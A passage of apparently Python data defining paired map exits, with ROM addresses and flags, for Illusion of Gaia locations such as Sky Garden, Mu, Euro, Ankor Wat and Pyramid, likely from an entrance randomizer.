261: [260, 0, 0, 0, 0, "5f429", b"\x4B\xe0\x01\xc0\x02\x03\x00\x44", False, True, True, "Nazca: Sky Garden exit"],
# Sky Garden
#270: [ 0, 0, 0, 171, 16, "", b"", False, True, True, "Moon Tribe: Sky Garden passage"],
273: [274, 0, 0, 170, 172, "", b"", False, True, False, "Sky Garden: Map 76 to Map 77"],
274: [273, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 77 to Map 76"],
275: [276, 0, 0, 170, 176, "", b"", False, True, False, "Sky Garden: Map 76 to Map 79"],
276: [275, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 79 to Map 76"],
277: [278, 0, 0, 170, 181, "", b"", False, True, False, "Sky Garden: Map 76 to Map 81"],
278: [277, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 81 to Map 76"],
279: [280, 0, 0, 170, 190, "", b"", False, True, False, "Sky Garden: Map 76 to Map 83"],
280: [279, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 83 to Map 76"],
281: [282, 0, 0, 172, 175, "", b"", False, True, False, "Sky Garden: Map 77 to Map 78 (E)"], # Room 1
282: [281, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 78 to Map 77 (W)"],
283: [284, 0, 0, 175, 173, "", b"", False, True, False, "Sky Garden: Map 78 to Map 77 (SE)"],
284: [283, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 77 to Map 78 (SW)"],
285: [286, 0, 0, 175, 174, "", b"", False, True, False, "Sky Garden: Map 78 to Map 77 (SW)"],
286: [285, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 77 to Map 78 (SE)"],
287: [288, 0, 0, 176, 169, "", b"", False, True, False, "Sky Garden: Map 79 to Map 86"], # Room 2
288: [287, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 86 to Map 79"],
289: [290, 0, 0, 176, 179, "", b"", False, True, False, "Sky Garden: Map 79 to Map 80 (NE)"],
290: [289, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 80 to Map 79 (NW)"],
291: [292, 0, 0, 179, 177, "", b"", False, True, False, "Sky Garden: Map 80 to Map 79 (N)"],
292: [291, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 79 to Map 80 (N)"],
293: [294, 0, 0, 178, 180, "", b"", False, True, False, "Sky Garden: Map 79 to Map 80 (S)"],
294: [293, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 80 to Map 79 (S)"],
295: [296, 0, 0, 168, 186, "", b"", False, True, False, "Sky Garden: Map 81 to Map 82 (NE)"], # Room 3
296: [295, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 82 to Map 81 (NW)"],
297: [298, 0, 0, 182, 188, "", b"", False, True, False, "Sky Garden: Map 81 to Map 82 (NW)"],
298: [297, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 82 to Map 81 (NE)"],
299: [300, 0, 0, 184, 187, "", b"", False, True, False, "Sky Garden: Map 81 to Map 82 (SE)"],
300: [299, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 82 to Map 81 (SW)"],
301: [302, 0, 0, 191, 196, "", b"", False, True, False, "Sky Garden: Map 83 to Map 84 (NW)"], # Room 4
302: [301, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 84 to Map 83 (NE)"],
303: [304, 0, 0, 192, 195, "", b"", False, True, False, "Sky Garden: Map 83 to Map 84 (C)"],
304: [303, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 84 to Map 83 (C)"],
305: [306, 0, 0, 197, 193, "", b"", False, True, False, "Sky Garden: Map 84 to Map 83 (SE)"],
306: [305, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 83 to Map 84 (SW)"],
307: [308, 0, 0, 167, 195, "", b"", False, True, False, "Sky Garden: Map 83 to Map 84 (E)"],
308: [307, 0, 0, 0, 0, "", b"", False, True, False, "Sky Garden: Map 84 to Map 83 (W)"],
# Seaside Palace
310: [311, 0, 0, 211, 201, "69759", b"", False, False, False, "Seaside entrance"], # ALWAYS LINKED
311: [310, 0, 0, 0, 0, "1906a", b"", False, False, False, "Seaside exit"],
312: [313, 0, 0, 200, 202, "19046", b"", False, False, False, "Seaside: Area 1 NE Room (in)"],
313: [312, 0, 0, 0, 0, "19114", b"", False, False, False, "Seaside: Area 1 NE Room (out)"],
314: [315, 0, 0, 200, 203, "19052", b"", False, False, False, "Seaside: Area 1 NW Room (in)"],
315: [314, 0, 0, 0, 0, "19120", b"", False, False, False, "Seaside: Area 1 NW Room (out)"],
316: [317, 0, 0, 200, 204, "1905e", b"", False, False, False, "Seaside: Area 1 SE Room (in)"],
317: [316, 0, 0, 0, 0, "1912c", b"", False, False, False, "Seaside: Area 1 SE Room (out)"],
318: [319, 0, 0, 200, 205, "1903a", b"", False, False, False, "Seaside: Area 2 entrance"],
319: [318, 0, 0, 0, 0, "19146", b"", False, False, False, "Seaside: Area 2 exit"],
320: [321, 0, 0, 205, 207, "1915e", b"", False, False, False, "Seaside: Area 2 SW Room (in)"],
321: [320, 0, 0, 0, 0, "19138", b"", False, False, False, "Seaside: Area 2 SW Room (out)"],
322: [323, 0, 0, 205, 209, "19152", b"", False, False, False, "Seaside: Fountain (in)"],
323: [322, 0, 0, 0, 0, "191d4", b"", False, False, False, "Seaside: Fountain (out)"],
# Mu
330: [331, 0, 0, 210, 212, "191ee", b"", False, True, True, "Mu entrance"],
331: [330, 0, 0, 0, 0, "191fc", b"", False, True, True, "Mu exit"],
332: [333, 0, 0, 212, 217, "", b"", False, True, False, "Mu: Map 95 to Map 96"],
333: [332, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 96 to Map 95"],
334: [335, 0, 0, 217, 220, "", b"", False, True, False, "Mu: Map 96 to Map 97 (top)"],
335: [334, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 97 to Map 96 (top)"],
336: [337, 0, 0, 220, 231, "", b"", False, True, False, "Mu: Map 97 to Map 99"],
337: [336, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 99 to Map 97"],
338: [339, 0, 0, 220, 225, "", b"", False, True, False, "Mu: Map 97 to Map 98 (top)"],
339: [338, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 98 to Map 97 (top)"],
340: [341, 0, 0, 218, 222, "", b"", False, True, False, "Mu: Map 96 to Map 97 (middle)"],
341: [340, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 97 to Map 96 (middle)"],
342: [343, 0, 0, 223, 227, "", b"", False, True, False, "Mu: Map 97 to Map 98 (middle)"],
343: [342, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 98 to Map 97 (middle)"],
# 344: [345, 0, 0, 000, 000, "", b"", False, True, False, "Mu: Map 95 to Map 98 (middle)"],
# 345: [344, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 98 to Map 95 (middle)"],
346: [347, 0, 0, 227, 233, "", b"", False, True, False, "Mu: Map 98 to Map 100 (middle E)"],
347: [346, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 100 to Map 98 (middle E)"],
348: [349, 0, 0, 233, 237, "", b"", False, True, False, "Mu: Map 100 to Map 101 (middle N)"],
349: [348, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 101 to Map 100 (middle N)"],
350: [351, 0, 0, 237, 234, "", b"", False, True, False, "Mu: Map 101 to Map 100 (middle S)"],
351: [350, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 100 to Map 101 (middle S)"],
352: [353, 0, 0, 234, 228, "", b"", False, True, False, "Mu: Map 100 to Map 98 (middle W)"],
353: [352, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 98 to Map 100 (middle W)"],
354: [355, 0, 0, 213, 232, "", b"", False, True, False, "Mu: Map 95 to Map 99"],
355: [354, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 99 to Map 95"],
356: [357, 0, 0, 245, 246, "", b"", False, True, False, "Mu: Map 95 to Map 98 (top)"],
357: [356, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 98 to Map 95 (top)"],
358: [359, 0, 0, 229, 224, "", b"", False, True, False, "Mu: Map 98 to Map 97 (bottom)"],
359: [358, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 97 to Map 98 (bottom)"],
360: [361, 0, 0, 224, 219, "", b"", False, True, False, "Mu: Map 97 to Map 96 (bottom)"],
361: [360, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 96 to Map 97 (bottom)"],
362: [363, 0, 0, 230, 216, "", b"", False, True, False, "Mu: Map 98 to Map 95 (bottom)"],
363: [362, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 95 to Map 98 (bottom)"],
364: [365, 0, 0, 230, 235, "", b"", False, True, False, "Mu: Map 98 to Map 100 (bottom)"],
365: [364, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 100 to Map 98 (bottom)"],
366: [367, 0, 0, 235, 239, "", b"", False, True, False, "Mu: Map 100 to Map 101 (bottom)"],
367: [366, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 101 to Map 100 (bottom)"],
368: [369, 0, 0, 239, 240, "", b"", False, True, False, "Mu: Map 101 to Map 102"],
369: [368, 0, 0, 0, 0, "", b"", False, True, False, "Mu: Map 102 to Map 101"],
# Angel Village
382: [383, 0, 0, 250, 210, "1941e", b"", False, False, False, "Angel: Mu Passage (in)"],
383: [382, 0, 0, 0, 0, "191e2", b"", False, False, False, "Angel: Mu Passage (out)"], #custom
384: [385, 0, 0, 250, 251, "1942a", b"", False, False, False, "Angel: Underground entrance (in)"],
385: [384, 0, 0, 0, 0, "19446", b"", False, False, False, "Angel: Underground entrance (out)"],
386: [387, 0, 0, 251, 252, "19452", b"", False, False, False, "Angel: Room 1 (in)"],
387: [386, 0, 0, 0, 0, "194de", b"", False, False, False, "Angel: Room 1 (out)"],
388: [389, 0, 0, 251, 253, "19476", b"", False, False, False, "Angel: Room 2 (in)"],
389: [388, 0, 0, 0, 0, "19502", b"", False, False, False, "Angel: Room 2 (out)"],
390: [391, 0, 0, 251, 254, "1945e", b"", False, False, False, "Angel: Dance Hall (in)"],
391: [390, 0, 0, 0, 0, "1950e", b"", False, False, False, "Angel: Dance Hall (out)"],
392: [393, 0, 0, 251, 255, "1946a", b"", False, False, False, "Angel: DS Room (in)"],
393: [392, 0, 0, 0, 0, "194f6", b"", False, False, False, "Angel: DS Room (out)"],
# Angel Dungeon
400: [401, 0, 0, 251, 260, "19482", b"", False, True, True, "Angel Dungeon entrance"],
401: [400, 0, 0, 0, 0, "19534", b"", False, True, True, "Angel Dungeon exit"],
402: [403, 0, 0, 260, 261, "19528", b"", False, True, False, "Angel Dungeon: Map 109 to Map 110"],
403: [402, 0, 0, 0, 0, "", b"", False, True, False, "Angel Dungeon: Map 110 to Map 109"],
404: [405, 0, 0, 278, 262, "", b"", False, True, False, "Angel Dungeon: Map 110 to Map 111"],
405: [404, 0, 0, 0, 0, "", b"", False, True, False, "Angel Dungeon: Map 111 to Map 110"],
406: [407, 0, 0, 262, 263, "", b"", False, True, False, "Angel Dungeon: Map 111 to Map 112"],
407: [406, 0, 0, 0, 0, "", b"", False, True, False, "Angel Dungeon: Map 112 to Map 111"],
408: [409, 0, 0, 264, 265, "", b"", False, True, False, "Angel Dungeon: Map 112 to Chest"],
409: [408, 0, 0, 0, 0, "", b"", False, True, False, "Angel Dungeon: Chest to Map 112"],
410: [411, 0, 0, 279, 266, "", b"", False, True, False, "Angel Dungeon: Map 112 to Map 113"],
411: [410, 0, 0, 0, 0, "", b"", False, True, False, "Angel Dungeon: Map 113 to Map 112"],
412: [413, 0, 0, 266, 267, "", b"", False, True, False, "Angel Dungeon: Map 113 to Map 114"],
413: [412, 0, 0, 0, 0, "", b"", False, True, False, "Angel Dungeon: Map 114 to Map 113"],
414: [415, 0, 0, 268, 276, "", b"", False, True, False, "Angel Dungeon: Map 114 to Ishtar Foyer"],
415: [414, 0, 0, 0, 0, "", b"", False, True, False, "Angel Dungeon: Ishtar Foyer to Map 114"],
# Ishtar's Studio
420: [421, 0, 0, 277, 269, "196b6", b"", False, False, False, "Ishtar entrance"],
421: [420, 0, 0, 0, 0, "196c2", b"", False, False, False, "Ishtar exit"],
422: [423, 0, 0, 269, 270, "196ce", b"", False, False, False, "Ishtar: Portrait room (in)"],
423: [422, 0, 0, 0, 0, "196f4", b"", False, False, False, "Ishtar: Portrait room (out)"],
424: [425, 0, 0, 269, 271, "196da", b"", False, False, False, "Ishtar: Side room (in)"],
425: [424, 0, 0, 0, 0, "19700", b"", False, False, False, "Ishtar: Side room (out)"],
426: [427, 0, 0, 269, 272, "196e6", b"", False, False, False, "Ishtar: Ishtar's room (in)"],
427: [426, 0, 0, 0, 0, "1970c", b"", False, False, False, "Ishtar: Ishtar's room (out)"],
428: [429, 0, 0, 272, 274, "19718", b"", False, False, False, "Ishtar: Puzzle room (in)"],
429: [428, 0, 0, 0, 0, "197e6", b"", False, False, False, "Ishtar: Puzzle room (out)"],
# Watermia
440: [441, 0, 0, 280, 286, "197f4", b"", False, False, False, "Watermia: Lance House (in)"],
441: [440, 0, 0, 0, 0, "1983e", b"", False, False, False, "Watermia: Lance House (out)"],
442: [443, 0, 0, 280, 282, "19818", b"", False, False, False, "Watermia: DS House (in)"],
443: [442, 0, 0, 0, 0, "19868", b"", False, False, False, "Watermia: DS House (out)"],
444: [445, 0, 0, 280, 283, "1980c", b"", False, False, False, "Watermia: Gambling House (in)"],
445: [444, 0, 0, 0, 0, "1985a", b"", False, False, False, "Watermia: Gambling House (out)"],
446: [447, 0, 0, 280, 284, "19824", b"", False, False, False, "Watermia: West House (in)"],
447: [446, 0, 0, 0, 0, "19882", b"", False, False, False, "Watermia: West House (out)"],
448: [449, 0, 0, 280, 285, "19830", b"", False, False, False, "Watermia: East House (in)"],
449: [448, 0, 0, 0, 0, "19890", b"", False, False, False, "Watermia: East House (out)"],
450: [451, 0, 0, 280, 287, "19800", b"", False, False, False, "Watermia: NW House (in)"],
451: [450, 0, 0, 0, 0, "1984c", b"", False, False, False, "Watermia: NW House (out)"],
452: [453, 0, 0, 288, 311, "", b"", False, False, True, "Watermia: Euro passage"],
453: [452, 0, 0, 0, 0, "", b"", False, False, True, "Euro: Watermia passage"],
# Great Wall
462: [463, 0, 0, 290, 291, "", b"", False, True, False, "Great Wall: Map 130 to Map 131"],
463: [462, 0, 0, 0, 0, "", b"", False, True, False, "Great Wall: Map 131 to Map 130"],
464: [465, 0, 0, 293, 294, "", b"", False, True, False, "Great Wall: Map 131 to Map 133"],
465: [464, 0, 0, 0, 0, "", b"", False, True, False, "Great Wall: Map 133 to Map 131"],
466: [467, 0, 0, 296, 297, "", b"", False, True, False, "Great Wall: Map 133 to Map 134"],
467: [466, 0, 0, 0, 0, "", b"", False, True, False, "Great Wall: Map 134 to Map 133"],
468: [469, 0, 0, 297, 298, "", b"", False, True, False, "Great Wall: Map 134 to Map 135"],
469: [468, 0, 0, 0, 0, "", b"", False, True, False, "Great Wall: Map 135 to Map 134"],
470: [471, 0, 0, 299, 300, "", b"", False, True, False, "Great Wall: Map 135 to Map 136"],
471: [470, 0, 0, 0, 0, "", b"", False, True, False, "Great Wall: Map 136 to Map 135"],
# Euro
482: [483, 0, 0, 310, 312, "19cd2", b"", False, False, False, "Euro: Rolek Company (in)"],
483: [482, 0, 0, 0, 0, "19d74", b"", False, False, False, "Euro: Rolek Company (out)"],
484: [485, 0, 0, 310, 313, "19d0e", b"", False, False, False, "Euro: West House (in)"],
485: [484, 0, 0, 0, 0, "19e12", b"", False, False, False, "Euro: West House (out)"],
486: [487, 0, 0, 310, 314, "19cde", b"", False, False, False, "Euro: Rolek Mansion West (in)"],
487: [486, 0, 0, 0, 0, "19d9c", b"", False, False, False, "Euro: Rolek Mansion West (out)"],
488: [489, 0, 0, 310, 314, "19cea", b"", False, False, False, "Euro: Rolek Mansion East (in)"],
489: [488, 0, 0, 0, 0, "19da8", b"", False, False, False, "Euro: Rolek Mansion East (out)"],
490: [491, 0, 0, 310, 317, "19d26", b"", False, False, False, "Euro: Central House (in)"],
491: [490, 0, 0, 0, 0, "19e54", b"", False, False, False, "Euro: Central House (out)"],
492: [493, 0, 0, 310, 318, "19d32", b"", False, False, False, "Euro: Jeweler House (in)"],
493: [492, 0, 0, 0, 0, "19e62", b"", False, False, False, "Euro: Jeweler House (out)"],
494: [495, 0, 0, 310, 319, "19d3e", b"", False, False, False, "Euro: Twins House (in)"],
495: [494, 0, 0, 0, 0, "19e70", b"", False, False, False, "Euro: Twins House (out)"],
496: [497, 0, 0, 310, 320, "19cc6", b"", False, False, False, "Euro: Hidden House (in)"],
497: [496, 0, 0, 0, 0, "19d66", b"", False, False, False, "Euro: Hidden House (out)"],
498: [499, 0, 0, 310, 321, "19d4a", b"", False, False, False, "Euro: Shrine (in)"],
499: [498, 0, 0, 0, 0, "19e7e", b"", False, False, False, "Euro: Shrine (out)"],
500: [501, 0, 0, 310, 322, "19cba", b"", False, False, False, "Euro: Explorer's House (in)"],
501: [500, 0, 0, 0, 0, "19d58", b"", False, False, False, "Euro: Explorer's House (out)"],
502: [ 0, 0, 0, 310, 323, "19cf6", b"", False, False, False, "Euro: Store Entrance (in)"],
#503: [502, 0, 0, 0, 0, "", b"", False, False, False, "Euro: Store Entrance (out)"], #this doesn't exist!
504: [505, 0, 0, 310, 324, "19d02", b"", False, False, False, "Euro: Store Exit (in)"],
505: [504, 0, 0, 0, 0, "19e04", b"", False, False, False, "Euro: Store Exit (out)"],
506: [507, 0, 0, 314, 316, "19db4", b"", False, False, False, "Euro: Guest Room (in)"],
507: [506, 0, 0, 0, 0, "19df6", b"", False, False, False, "Euro: Guest Room (out)"],
508: [509, 0, 0, 310, 325, "19d1a", b"", False, False, False, "Euro: Dark Space House (in)"],
509: [508, 0, 0, 0, 0, "19e20", b"", False, False, False, "Euro: Dark Space House (out)"],
# Mt. Kress
522: [523, 0, 0, 330, 331, "", b"", False, True, False, "Mt. Kress: Map 160 to Map 161"],
523: [522, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 161 to Map 160"],
524: [525, 0, 0, 332, 333, "", b"", False, True, False, "Mt. Kress: Map 161 to Map 162 (W)"],
525: [524, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 162 to Map 161 (W)"],
526: [527, 0, 0, 332, 334, "", b"", False, True, False, "Mt. Kress: Map 161 to Map 162 (E)"],
527: [526, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 162 to Map 161 (E)"],
528: [529, 0, 0, 333, 337, "", b"", False, True, False, "Mt. Kress: Map 162 to Map 163 (N)"],
529: [528, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 163 to Map 162 (N)"],
530: [531, 0, 0, 337, 336, "", b"", False, True, False, "Mt. Kress: Map 163 to Map 162 (S)"],
531: [530, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 162 to Map 163 (S)"],
532: [533, 0, 0, 333, 338, "", b"", False, True, False, "Mt. Kress: Map 162 to Map 164"],
533: [532, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 164 to Map 162"],
534: [535, 0, 0, 335, 339, "", b"", False, True, False, "Mt. Kress: Map 162 to Map 165"],
535: [534, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 165 to Map 162"],
536: [537, 0, 0, 339, 342, "", b"", False, True, False, "Mt. Kress: Map 165 to Map 166"],
537: [536, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 166 to Map 165"],
538: [539, 0, 0, 340, 343, "", b"", False, True, False, "Mt. Kress: Map 165 to Map 167"],
539: [538, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 167 to Map 165"],
540: [541, 0, 0, 341, 344, "", b"", False, True, False, "Mt. Kress: Map 165 to Map 168"],
541: [540, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 168 to Map 165"],
542: [543, 0, 0, 344, 345, "", b"", False, True, False, "Mt. Kress: Map 168 to Map 169"],
543: [542, 0, 0, 0, 0, "", b"", False, True, False, "Mt. Kress: Map 169 to Map 168"],
# Native's Village
552: [553, 0, 0, 350, 352, "19fe6", b"", False, False, False, "Native's Village: West House (in)"],
553: [552, 0, 0, 0, 0, "1a00c", b"", False, False, False, "Native's Village: West House (out)"],
554: [555, 0, 0, 350, 353, "19ff2", b"", False, False, False, "Native's Village: House w/Statues (in)"],
555: [554, 0, 0, 0, 0, "1a01a", b"", False, False, False, "Native's Village: House w/Statues (out)"],
556: [557, 0, 0, 351, 400, "", b"", False, False, True, "Native's Village: Dao Passage"],
557: [556, 0, 0, 0, 0, "", b"", False, False, True, "Dao: Natives' Passage"],
# Ankor Wat
562: [563, 0, 0, 360, 361, "1a028", b"", False, True, False, "Ankor Wat: Map 176 to Map 177"],
563: [562, 0, 0, 0, 0, "1a036", b"", False, True, False, "Ankor Wat: Map 177 to Map 176"],
564: [565, 0, 0, 361, 363, "", b"", False, True, False, "Ankor Wat: Map 177 to Map 178"],
565: [564, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 178 to Map 177"],
566: [567, 0, 0, 365, 366, "", b"", False, True, False, "Ankor Wat: Map 178 to Map 179"],
567: [566, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 179 to Map 178"],
568: [569, 0, 0, 368, 367, "", b"", False, True, False, "Ankor Wat: Map 180 to Map 179"],
569: [568, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 179 to Map 180"],
570: [571, 0, 0, 367, 369, "", b"", False, True, False, "Ankor Wat: Map 179 to Map 181"],
571: [570, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 181 to Map 179"],
572: [573, 0, 0, 371, 362, "", b"", False, True, False, "Ankor Wat: Map 181 to Map 177"],
573: [572, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 177 to Map 181"],
574: [575, 0, 0, 362, 372, "", b"", False, True, False, "Ankor Wat: Map 177 to Map 182"], # Garden
575: [574, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 182 to Map 177"],
576: [577, 0, 0, 372, 373, "", b"", False, True, False, "Ankor Wat: Map 182 to Map 183"],
577: [576, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 183 to Map 182"],
578: [579, 0, 0, 373, 376, "", b"", False, True, False, "Ankor Wat: Map 183 to Map 184"],
579: [578, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 184 to Map 183"],
580: [581, 0, 0, 374, 378, "", b"", False, True, False, "Ankor Wat: Map 183 to Map 185 (W)"],
581: [580, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 185 to Map 183 (W)"],
582: [583, 0, 0, 378, 375, "", b"", False, True, False, "Ankor Wat: Map 185 to Map 183 (E)"],
583: [582, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 183 to Map 185 (E)"],
584: [585, 0, 0, 375, 379, "", b"", False, True, False, "Ankor Wat: Map 183 to Map 186"],
585: [584, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 186 to Map 183"],
586: [587, 0, 0, 379, 381, "", b"", False, True, False, "Ankor Wat: Map 186 to Map 187 (W)"],
587: [586, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 187 to Map 186 (W)"],
588: [589, 0, 0, 381, 380, "", b"", False, True, False, "Ankor Wat: Map 187 to Map 186 (E)"],
589: [588, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 186 to Map 187 (E)"],
590: [591, 0, 0, 381, 384, "", b"", False, True, False, "Ankor Wat: Map 187 to Map 188"],
591: [590, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 188 to Map 187"],
592: [593, 0, 0, 393, 386, "", b"", False, True, False, "Ankor Wat: Map 188 to Map 189"],
593: [592, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 189 to Map 188"],
594: [595, 0, 0, 387, 389, "", b"", False, True, False, "Ankor Wat: Map 189 to Map 190 (E)"],
595: [594, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 190 to Map 189 (E)"],
596: [596, 0, 0, 388, 390, "", b"", False, True, False, "Ankor Wat: Map 189 to Map 190 (W)"],
597: [597, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 190 to Map 189 (W)"],
598: [599, 0, 0, 390, 391, "", b"", False, True, False, "Ankor Wat: Map 190 to Map 191"],
599: [598, 0, 0, 0, 0, "", b"", False, True, False, "Ankor Wat: Map 191 to Map 190"],
600: [ 0, 0, 0, 366, 368, "", b"", False, True, False, "Ankor Wat: Map 179 to Map 180 (drop)"],
601: [ 0, 0, 0, 392, 381, "", b"", False, True, False, "Ankor Wat: Map 188 to Map 187 NW-L (drop)"],
602: [ 0, 0, 0, 392, 381, "", b"", False, True, False, "Ankor Wat: Map 188 to Map 187 NW-R (drop)"],
603: [ 0, 0, 0, 392, 383, "", b"", False, True, False, "Ankor Wat: Map 188 to Map 187 NE (drop)"],
604: [ 0, 0, 0, 393, 382, "", b"", False, True, False, "Ankor Wat: Map 188 to Map 187 SW (drop)"],
605: [ 0, 0, 0, 389, 388, "", b"", False, True, False, "Ankor Wat: Map 190 to Map 189 (drop)"],
# Dao
612: [613, 0, 0, 400, 401, "1a27c", b"", False, False, False, "Dao: NW House (in)"],
613: [612, 0, 0, 0, 0, "1a2d2", b"", False, False, False, "Dao: NW House (out)"],
614: [615, 0, 0, 400, 402, "1a288", b"", False, False, False, "Dao: Neil's House (in)"],
615: [614, 0, 0, 0, 0, "1a30a", b"", False, False, False, "Dao: Neil's House (out)"],
616: [617, 0, 0, 400, 403, "1a294", b"", False, False, False, "Dao: Snake Game House (in)"],
617: [616, 0, 0, 0, 0, "1a2ee", b"", False, False, False, "Dao: Snake Game House (out)"],
618: [619, 0, 0, 400, 404, "1a2a0", b"", False, False, False, "Dao: SW House (in)"],
619: [618, 0, 0, 0, 0, "1a2fc", b"", False, False, False, "Dao: SW House (out)"],
620: [621, 0, 0, 400, 405, "1a2ac", b"", False, False, False, "Dao: S House (in)"],
621: [620, 0, 0, 0, 0, "1a2e0", b"", False, False, False, "Dao: S House (out)"],
622: [623, 0, 0, 400, 406, "1a2b8", b"", False, False, False, "Dao: SE House (in)"],
623: [622, 0, 0, 0, 0, "1a318", b"", False, False, False, "Dao: SE House (out)"],
# Pyramid
634: [635, 0, 0, 411, 415, "", b"", False, True, False, "Pyramid: Map 204 to Map 205"],
635: [634, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 205 to Map 204"],
636: [637, 0, 0, 413, 416, "", b"", False, True, False, "Pyramid: Map 204 to Map 206"], # Room 1
637: [636, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 206 to Map 204"],
638: [639, 0, 0, 417, 418, "", b"", False, True, False, "Pyramid: Map 206 to Map 207"],
639: [638, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 207 to Map 206"],
640: [641, 0, 0, 419, 442, "", b"", False, True, False, "Pyramid: Map 207 to Map 218"],
641: [640, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 218 to Map 207"],
642: [643, 0, 0, 413, 420, "", b"", False, True, False, "Pyramid: Map 204 to Map 208"], # Room 2
643: [642, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 208 to Map 204"],
644: [645, 0, 0, 421, 422, "", b"", False, True, False, "Pyramid: Map 208 to Map 209"],
645: [644, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 209 to Map 208"],
646: [647, 0, 0, 423, 443, "", b"", False, True, False, "Pyramid: Map 209 to Map 218"],
647: [646, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 218 to Map 209"],
648: [649, 0, 0, 413, 431, "", b"", False, True, False, "Pyramid: Map 204 to Map 214"], # Room 3
649: [648, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 214 to Map 204"],
650: [651, 0, 0, 434, 435, "", b"", False, True, False, "Pyramid: Map 214 to Map 215"],
651: [650, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 214 to Map 215"],
652: [653, 0, 0, 435, 444, "", b"", False, True, False, "Pyramid: Map 215 to Map 218"],
653: [652, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 218 to Map 215"],
654: [655, 0, 0, 413, 436, "", b"", False, True, False, "Pyramid: Map 204 to Map 216"], # Room 4
655: [654, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 216 to Map 204"],
656: [657, 0, 0, 437, 438, "", b"", False, True, False, "Pyramid: Map 216 to Map 217"],
657: [656, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 217 to Map 216"],
658: [659, 0, 0, 439, 440, "", b"", False, True, False, "Pyramid: Map 217 to Map 219"],
659: [658, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 219 to Map 217"],
660: [661, 0, 0, 441, 445, "", b"", False, True, False, "Pyramid: Map 219 to Map 218"],
661: [660, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 218 to Map 219"],
662: [663, 0, 0, 413, 426, "", b"", False, True, False, "Pyramid: Map 204 to Map 212"], # Room 5
663: [662, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 212 to Map 204"],
664: [665, 0, 0, 429, 430, "", b"", False, True, False, "Pyramid: Map 212 to Map 213"],
665: [664, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 213 to Map 212"],
